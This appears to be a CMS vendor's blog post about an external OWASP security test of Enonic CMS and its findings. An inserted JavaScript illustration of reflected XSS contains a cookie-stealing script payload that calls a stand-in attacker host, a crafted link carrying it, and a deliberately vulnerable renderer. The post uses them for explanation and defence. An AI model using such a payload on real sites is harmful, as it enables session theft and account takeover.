Experiences with OWASP-testing


    The only 100% secure computer is turned off or disconnected from the internet. Unfortunately, this is not an option for a web-server or a CMS. In order to make sure Enonic CMS is at the forefront of the latest developments in this field, we hired an external white hat security expert to test Enonic CMS according to the OWASP testing methodology.

    What is OWASP?

    OWASP, an abbreviation for Open Web Application Security Project, is "an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted"[1].  OWASP is also an emerging standards body, with the ASVS, the Application Security Verification Standard[2].  The OWASP Testing Guide, now at version 4.0, provides a methodology for security testing.  It does not simply provide a checklist for testers to sign off, but aims to "help people understand the what, why, when, where and how of testing their web-applications."[3]

    At Enonic, we wanted some experts to look at our system and determine whether it has any security holes.  The OWASP Testing Guide is a very solid piece of work, so we looked for a white hat security expert who could put our system through the OWASP grinder.  We found the small Norwegian company Encripto (encripto.no), which did a great job "hacking us".

    How is an OWASP test conducted?

    It is most common to test web-sites.  In the case of Enonic, we wanted our product tested, but Enonic CMS on its own is not reachable from the outside, and therefore exposes no security issues until it is running a web-site.  So we decided to set up a copy of www.enonic.com to conduct the OWASP test on.  enonic.com is a very standard web-site that runs on a cluster configuration, with many of the special features of Enonic CMS in use, so it is a good representative to test on.

    Our white hat security expert hammered away for one week, using a combination of automatic tools and manual testing to find vulnerabilities.

    Results of the testing

    It turned out that a total of 20 issues were discovered during the testing.  One very interesting finding about these 20 issues was that some had nothing to do with the Enonic CMS product, but were introduced by the site developer.

    One example of this is user-supplied data being redisplayed in the result page without careful consideration of what it may contain.  For instance: if a form allows the user to post data to the server that is then displayed straight back to the user, an attacker can craft a link with embedded JavaScript and send it to a potential victim.  When the victim clicks the link, the result page includes the embedded JavaScript, which is now executed in the victim's browser, in the context of the site.  Since it runs on behalf of the victim, it has access to possibly sensitive data about that user, which the script can exfiltrate.  This is reflected cross-site scripting (XSS), and it is the site template, not the CMS, that decides whether the value is encoded before it is written into the page.
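    The following is an added illustration of the reflected XSS pattern described above; it is not code from Enonic CMS or from the Encripto report.  It models a search page that echoes the `q` query parameter back into the result page (the route, parameter name, site and attacker hostnames are assumptions).  The vulnerable renderer concatenates the raw value into the markup; the hardened one entity-encodes it for the HTML text context it lands in.  The crafted link is built exactly the way an attacker would build it, and `serve` plays the role of the server reflecting the parameter.

```javascript
// Reflected XSS: vulnerable vs. hardened rendering of a user-supplied value.
// Added example, not Enonic's code. Route, parameter and hostnames are assumptions.

// Entity-encode the five characters that can break out of an HTML text or
// quoted-attribute context. This is the minimum a template must do before
// writing untrusted input into a page.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the request parameter is concatenated straight into the markup.
function renderSearchVulnerable(query) {
  return `<h1>Search</h1><p>Results for: ${query}</p>`;
}

// Hardened: the same value is encoded for the HTML text context it lands in.
function renderSearchSafe(query) {
  return `<h1>Search</h1><p>Results for: ${escapeHtml(query)}</p>`;
}

// Stand-in for the server: parse the link the victim clicked, pull out "q"
// (URL-decoded, as the server would see it) and hand it to the renderer.
function serve(render, url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return render(q);
}

// Detection helper: does the rendered page contain an executable <script>
// element? (A browser would run it; an encoded "&lt;script&gt;" is inert text.)
function containsInjectedScript(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html);
}

// Constructed attacker payload: ship the victim's cookies to an attacker host.
const PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>";

// The link the attacker sends to the victim. URLSearchParams percent-encodes
// the payload, so the URL looks harmless until the server decodes it.
const CRAFTED_LINK = `https://www.example.com/search?${new URLSearchParams({ q: PAYLOAD })}`;

// Run both renderers against the same crafted link and report the outcome.
function demo() {
  const vulnerable = serve(renderSearchVulnerable, CRAFTED_LINK);
  const safe = serve(renderSearchSafe, CRAFTED_LINK);
  return {
    vulnerableHtml: vulnerable,
    safeHtml: safe,
    vulnerableExecutes: containsInjectedScript(vulnerable), // true
    safeExecutes: containsInjectedScript(safe),             // false
  };
}

console.log(demo());
```

Note that `escapeHtml` is only correct for HTML text and quoted attribute values; a value written into a `<script>` block, a URL, or a CSS rule needs encoding for that context instead, which is why the check belongs in the template that knows where the value ends up.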

    Watch this site for an upcoming article about how to develop secure sites and which tools Enonic CMS provide to help developers create secure sites.

    Most of the security issues discovered were ones the server itself could detect, analyze and reject before they reach the site.  A total of eleven security holes were fixed for the 4.7.6 release and nine for 4.5.9.  Three of these were high risk issues that could have had dangerous consequences if exploited by an attacker.

    Conclusion

    Our experience with OWASP security testing was highly positive.  The OWASP framework is set up not only to check off a list of tests that have been executed, but to build security into the development process and make sure the risks are not only discovered, but understood.  After the test had been conducted, we had a day-long session to go through all the issues that were found, learn why they appear and how to fix them.

    The most severe security issues should now be taken care of in Enonic CMS, but we still plan on having an OWASP test done on every future release, and with our new 5.0 product coming up, this will be very important.  We also recommend that everybody who is developing large web sites, or sites with user interaction, gets their sites OWASP tested.


    [1] About the Open Web Application Security Project - https://www.owasp.org/index.php/About_OWASP

    [2] The OWASP Application Security Verification Standard Project - https://www.owasp.org/index.php/ASVS

    [3] An Introduction to the OWASP Testing Guide - https://www.owasp.org/index.php/Testing_Guide_Introduction
